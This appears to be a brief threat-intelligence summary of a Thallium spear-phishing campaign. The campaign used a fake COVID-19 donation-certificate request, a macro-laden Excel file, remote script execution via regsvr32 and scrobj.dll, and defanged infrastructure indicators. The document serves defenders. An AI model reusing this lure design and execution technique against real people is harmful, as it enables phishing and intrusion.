ESTsecurity ESRC reported a Thallium spear-phishing campaign timed around Korean year-end tax settlement activity and disguised as a 2021 COVID-19 donation-certificate request. The lure email delivered a ZIP containing a benign-looking PDF and an Excel binary workbook; enabling macros caused the workbook to contact attacker-controlled FTP infrastructure and execute a remote script through regsvr32 and scrobj.dll. The source identifies kvz.factorgpu[.]com and passive DNS address 23.106.160[.]32, linking the activity to a prior Thallium case that used similar malicious-document TTPs and the same last-modifier account. ESRC characterizes Thallium as an active threat actor in Korea using supply-chain attacks, fake servers, and spear phishing across multiple sectors.